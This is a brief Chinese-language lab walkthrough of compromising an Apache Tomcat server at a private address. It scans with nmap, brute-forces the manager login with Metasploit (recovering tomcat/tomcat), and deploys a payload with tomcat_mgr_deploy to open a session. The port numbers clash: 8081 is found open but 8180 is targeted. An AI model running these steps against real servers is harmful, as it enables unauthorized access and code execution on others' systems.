使用nmap命令对目标主机进行扫描。
nmap –sV 192.168.1.3,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。
msfconsole,启动MSF终端。
search tomcat, 搜索tomcat的相关工具和攻击载荷。
use auxiliary/scanner/http/tomcat_mgr_login, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
set RHOSTS 192.168.1.3,设置攻击目标主机IP。
set RPORT 8180,设置攻击目标主机端口号。
exploit, 实施攻击。获得用户名tomcat,密码tomcat。
use exploit/multi/http/tomcat_mgr_deploy, 启用漏洞利用模块, 提示符就会提示进入到该路径下。
set RHOST 192.168.1.3,设置攻击的目标主机IP。
set RPORT 8180,设置攻击目标主机端口号。
set username tomcat,设置攻击时使用的登录账号tomcat。
set password tomcat,设置攻击时使用的密码tomcat。
exploit,开始攻击,建立会话。